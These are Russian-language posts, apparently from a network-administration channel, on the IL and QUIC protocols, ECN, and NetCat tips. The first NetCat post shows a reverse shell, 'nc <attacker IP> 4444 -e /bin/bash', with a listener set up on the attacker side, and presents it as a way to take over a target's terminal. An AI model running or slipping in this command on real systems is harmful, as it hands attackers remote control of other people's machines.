Когда речь заходит о сетевых протоколах, все сразу вспоминают TCP и UDP. Но в мире сетевых технологий есть множество менее известных, но всё же любопытных решений.

Давайте разберём два таких протокола: IL и QUIC. Они создавались для разных задач, но оба по-своему интересны.


IL — забытый протокол от Bell Labs

Протокол IL появился в системе Plan 9, которую разрабатывала Bell Labs как преемника UNIX.

В отличие от TCP, IL был проще, но при этом обеспечивал надёжную передачу данных. Он работал поверх IP и использовал подтверждения доставки, но без сложных механизмов управления перегрузкой.

Основное преимущество IL — низкие задержки и предсказуемое поведение. Он не пытался угадывать, насколько загружена сеть, а просто честно передавал данные и ждал подтверждения.

Это делало его удобным для небольших кластеров и систем с предсказуемой сетью, но не очень подходило для масштабных сетей с переменной загрузкой. 


В итоге IL так и остался нишевым решением, хотя его идеи повлияли на разработку других протоколов.

QUIC — новый игрок, который хочет заменить TCP

QUIC — это относительно молодой протокол, разработанный Google.

В отличие от IL, он не просто альтернатива TCP, а полноценный ответ на его недостатки. QUIC работает поверх UDP и сразу включает в себя функции, которые в TCP требуют дополнительных надстроек, например, шифрование и мультиплексирование потоков.

Одна из главных фишек QUIC — быстрая установка соединения. В TCP на это уходит несколько шагов, а в QUIC всё происходит за один-единственный обмен пакетами.

Это делает его идеальным для веб-сервисов, где каждая миллисекунда на счету.

Кроме того, QUIC более устойчив к потере пакетов, потому что один медленный поток не тормозит другие.


N.A. ℹ️ BashTex

Читать полностью…

Network Admin

ECN (Explicit Congestion Notification) — управляем перегрузкой сети

Когда сеть перегружена, маршрутизаторы обычно сбрасывают пакеты. Это заставляет протокол TCP снижать скорость передачи, но ведёт к потерям данных и необходимости их повторной отправки.

Такой механизм работает, но он неэффективен: задержки увеличиваются, а сеть используется нерационально.


Explicit Congestion Notification (ECN) предлагает альтернативный подход.

Вместо того чтобы сбрасывать пакеты, маршрутизатор просто помечает их специальным флагом в заголовке.

Получатель, обнаружив эту метку, сообщает отправителю, что сеть перегружена. В ответ отправитель снижает скорость передачи данных, предотвращая дальнейшую перегрузку.

Этот механизм позволяет избежать ненужных потерь и повторных передач. В отличие от традиционного TCP, который снижает скорость только после сброса пакетов, ECN работает на упреждение.

Это особенно полезно в высоконагруженных сетях, где даже небольшие потери могут вызывать значительные задержки.

ECN используется в современных дата-центрах, облачных сервисах и в приложениях, чувствительных к задержкам, таких как VoIP и онлайн-игры. 


Однако не все устройства и провайдеры поддерживают этот механизм. В некоторых случаях фаерволы и NAT могут блокировать пакеты с ECN, считая их подозрительными.

🔥 Несмотря на это, всё больше сетей начинают внедрять поддержку ECN, поскольку он помогает сделать интернет-соединения стабильнее и эффективнее.

Читать полностью…

Network Admin

Продвинутые возможности NetCat
Часть 2


4️⃣ Передача каталогов через tar

NetCat позволяет передавать целые каталоги, используя tar.

Пример: Передача папки my_folder:
На принимающей стороне:

$ nc -l 12345 | tar -xvf -


На отправляющей стороне:

$ tar -cvf - my_folder | nc <IP-адрес> 12345


5️⃣ Проброс портов

NetCat можно применять для проброса портов, что удобно при тестировании и отладке сетевых соединений.

Пример: Проброс трафика с порта 8080 на порт 9090:

$ nc -l 8080 | nc 127.0.0.1 9090


6️⃣ Постоянное соединение

Чтобы NetCat оставался активным даже после завершения сеанса, используйте бесконечный цикл:

$ while true; do nc -l 12345; done


7️⃣ Тестирование UDP и работа с multicast

NetCat поддерживает отправку UDP-пакетов, что позволяет тестировать многоадресную передачу.

Пример: Отправка данных в группу 224.0.0.1 через порт 5000:

$ echo "Test multicast" | nc -u 224.0.0.1 5000

Читать полностью…

Network Admin

Продвинутые возможности NetCat — Часть 1

1️⃣Перехват и анализ данных

NetCat можно использовать как простой сниффер для анализа данных, проходящих через сеть.

Пример: Прокси для перехвата HTTP-запросов:

$ nc -l 8080


Все запросы, отправленные на порт 8080, будут отображаться в консоли. Чтобы отправить запрос, подключите к этому порту браузер или curl:

$ curl -x http://<IP-адрес>:8080 http://example.com


2️⃣ Создание обратного шелла

NetCat может использоваться для создания обратного шелла для удалённого управления.

Пример: На атакующей стороне включается прослушивание:

$ nc -l -p 4444


На целевой машине устанавливается соединение с атакующим устройством:

$ nc <IP-адрес атакующего> 4444 -e /bin/bash


Теперь атакующая сторона получает доступ к терминалу целевой машины.

3️⃣ Передача файлов с компрессией

Для передачи файлов NetCat можно использовать совместно с gzip, чтобы сжимать данные.

Пример:
На принимающей стороне:

$ nc -l 12345 | gzip -d > file.txt


На отправляющей стороне:

$ gzip -c file.txt | nc <IP-адрес> 12345

Читать полностью…
Subscribe to a channel